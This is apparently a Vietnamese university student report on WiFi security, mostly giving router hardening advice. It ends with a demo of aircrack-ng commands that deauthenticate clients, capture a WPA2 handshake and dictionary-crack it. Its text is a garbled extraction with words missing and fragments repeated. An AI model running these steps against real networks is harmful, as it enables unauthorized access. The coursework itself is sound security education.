HỌC VIỆN KỸ THUẬT MẬT MÃ KHOA CÔNG NGHỆ THƠNG TIN BÁO CÁO MƠN HỌC CƠ SỞ AN TỒN THƠNG TIN Đề tài: TÌM HIỂU VỀ MẠNG WIFI VÀ CÁC VẤN ĐỀ AN TỒN Sinh viên thực hiện: Ngơ Thị Trinh AT150259 Phạm Đỗ Thùy Linh AT150232 Nguyễn Đình Hùng AT150224 Giảng viên môn: Nguyễn Mạnh Thắng Hà Nội, 10-2021 Mục lục Mục lục hình ảnh Mục lục bảng Hình 9: Thay đổi mật định tuyến Bước 3: Thay đổi mật Wifi SSID: Đặt mật Wfi mạnh chọn WPA2PSK (AES) làm loại xác thực để bảo mật tốt Hình 10: Đặt mật mạnh cho wifi + Vơ hiệu hóa WPS (Wifi Protected Setup): WPS tính hỗ trợ kết nối mạng WiFi thiết bị thu phát với nhau, lại bỏ qua bước phải nhập mật WiFi truyền thống Với WPS bật, bạn kết nối thiết bị với định tuyến mà khơng cần mật ID định tuyến Điều giúp bạn tiết kiệm thời gian kết nối thiết bị cho phép bạn kết nối thiết bị dù bạn có nhớ mật định tuyến hay không Tuy nhiên, WPS kèm với rủi ro bảo mật nghiêm trọng mà bạn tránh khỏi Khi WPS bật, kẻ cơng đốn mật định tuyến nhiều lần chúng tìm thấy mật xác Nếu bạn chưa thực bước để cải thiện bảo mật định tuyến, định tuyến bạn đặc biệt dễ bị cơng Vì bạn nên tắt WPS để bảo vệ mạng Wifi bạn + Ẩn tên mạng Wifi: Theo tiêu chuẩn IEEE 802.11, mạng khơng dây phải có số nhận dạng thiết bị sử dụng để kết nối mạng gọi Service Set Identifier (SSID), nói cách dễ hiểu gọi tên mạng Cứ khoảng 100 mili giây, router phát beacon frame (khung báo hiệu), với chức truyền tín hiệu chứa thơng tin mạng, bao gồm SSID nhằm thông báo mạng có tồn Vậy nên, bạn ngăn router thơng báo diện nó, thiết bị điện tử khác khơng thấy khó để kết nối vào mạng Tuy nhiên việc ẩn mạng không bổ sung lớp bảo mật cho mạng Wifi Cách ẩn mạng Wifi ● ● ● ● Tại trình duyệt web, bạn đăng nhập vào địa IP với đường dẫn http://192.168.0.1 http://192.168.1.1 xác bạn xem thiết bị router bạn Bạn nhập thông tin tài khoản mật theo thông tin cung cấp thiết bị router sách hướng dẫn Bạn nhìn vào menu nhỏ góc bên trái, nhấp vào Wireless > Wireless Settings Tiếp theo, bạn tìm tùy chọn Enable SSID Broadcast bỏ chọn nó, sau lưu lại Bây mạng xuất dạng mạng ẩn bạn phải nhập tên mạng theo thủ cơng kết nối + Bật tính lọc địa MAC Trên mạng không dây thông thường, thiết bị có thơng tin đăng nhập thích hợp (biết SSID mật khẩu) xác thực với định tuyến tham gia mạng, nhận địa IP truy cập internet tài nguyên chia sẻ Lọc địa MAC thêm lớp bổ sung cho trình Trước cho phép thiết bị tham gia vào mạng, router kiểm tra địa MAC thiết bị dựa vào danh sách địa chấp thuận Nếu địa khách hàng khớp với địa danh sách định tuyến, quyền truy cập cấp bình thường; khơng, bị chặn tham gia Để thiết lập lọc MAC định tuyến, quản trị viên phải định cấu hình danh sách thiết bị phép tham gia Địa vật lý thiết bị phê duyệt phải tìm thấy sau địa cần nhập vào định tuyến tùy chọn lọc địa MAC bật Hầu hết định tuyến cho phép bạn xem địa MAC thiết bị kết nối từ bảng điều khiển dành cho quản trị viên Nếu khơng, bạn sử dụng hệ điều hành bạn để làm điều Khi bạn có danh sách địa MAC, vào cài đặt định tuyến đặt chúng vào vị trí thích hợp chúng Hình 12: Wlan MAC filter + Tắt quyền quản trị từ xa Hầu hết định tuyến cho phép bạn truy cập giao diện chúng từ thiết bị kết nối Tuy nhiên, số số chúng cho phép truy cập từ hệ thống từ xa Sau bạn tắt quyền truy cập từ xa, tác nhân độc hại truy cập cài đặt quyền riêng tư định tuyến từ thiết bị không kết nối với mạng không dây bạn Để thực thay đổi này, truy cập giao diện web tìm kiếm Quyền truy cập từ xa Quản trị từ xa Hình 13: Cấu hình quản lý từ xa + Kích hoạt tính bảo mật bổ sung cho định tuyến: - SPI Firewall (Stateful Packet Inspection Firewall): Tường lửa SPI ghi lại định danh tất gói mà mạng truyền gói đến cố gắng truy cập mạng, tường lửa xác định xem có phải phản hồi cho gói gửi từ mạng hay khơng khơng u cầu Tường lửa SPI sử dụng danh sách kiểm soát truy cập, sở liệu thực thể đáng tin cậy đặc quyền truy cập mạng họ Tường lửa SPI tham chiếu ACL xem xét kỹ lưỡng gói tin để xác định xem có đến từ nguồn đáng tin cậy hay khơng có định tuyến mạng Tường lửa SPI lập trình để thả gói tin gửi từ nguồn không liệt kê ACL, giúp ngăn chặn công từ chối dịch vụ, kẻ cơng làm ngập mạng với lưu lượng truy cập đến nỗ lực làm tài nguyên kết xuất khơng thể đáp ứng yêu cầu hợp pháp Trang web Netgear lưu ý viết "Bảo mật: So sánh NAT, Lọc nội dung tĩnh, SPI Tường lửa" tường lửa SPI kiểm tra gói để biết đặc điểm khai thác hack biết, công DoS giả mạo IP, thả gói tin mà nhận có khả độc hại - Mạng riêng ảo (VPN) - Cổng lớp ứng dụng (ALG) DEMO: Phương pháp sử dụng wifite để công từ điển vào mạng wifi bảo mật WPA2 Chuẩn bị: ● Máy có cài hệ điều hành kali linux ● Wifite máy kali linux ● File từ điển password (có thể tải duckduckgo tạo file list cho mình) Các bước thực hiện: Bước 1: Kiểm tra card mạng có máy: airmon-ng Tại thấy máy có mạng wlan0 mạng wifi máy Bước 2: Bật chế độ monitior cho card mạng : airmon-ng start [tên card wifi vừa tìm thấy] Tiếp theo kiểm tra monitor bật hay chưa : airmon-ng Bước3 : Tiến hành scan để quét mạng xung quanh airodump-ng [tên card wifi] Lưu số thông tin cần thiết : Tên wifi(ESSID) : = ?? BSSID: = ?? CH(Kênh) : = ?? Bước 4: Tiến hành dò airodump-ng -c [CH] –bssid [bssid cần dò] -w [Tên wifi cần dò] [tên vlan bật monitor] Bước 5: Mở thêm cửa sở Terminal aireplay-ng -0 30 -a [BSSID] [Tên card wifi] Nếu bên cửa số xuât WPA handshake ctrl + c để dừng lại Bước 6: Lấy file chương trình tạo thường có tên: [Tên wifi].cab aircrack-ng [đường dẫn file *.cab] Bước 7: Dùng file tử điển đề aircrack-ng -a -w [file từ điển] [file *.cab] ... giúp người hiểu rõ Wifi vấn đề liên quan đến Wifi nhóm xin trình bày chủ đề ? ?Tìm hiểu mạng Wifi vấn đề an toàn? ?? với nội dung bao gồm chương sau: Chương 1: Tổng quan mạng Wifi Chương 2: Các chuẩn... Wifi Chương 3: Các chuẩn bảo mật Wifi Chương 4: Các nguy an toàn sử dụng mạng Wifi Chương 5: Cách thức cài đặt đảm bảo an toàn cho mạng Wifi gia đình Trong trình thực đề tài, hạn chế thời gian... VIỆN KỸ THUẬT MẬT MÃ KHOA CÔNG NGHỆ THÔNG TIN BÁO CÁO MƠN HỌC CƠ SỞ AN TỒN THƠNG TIN Đề tài: TÌM HIỂU VỀ MẠNG WIFI VÀ CÁC VẤN ĐỀ AN TỒN Sinh viên thực hiện: Ngơ Thị Trinh AT150259 Phạm Đỗ Thùy Linh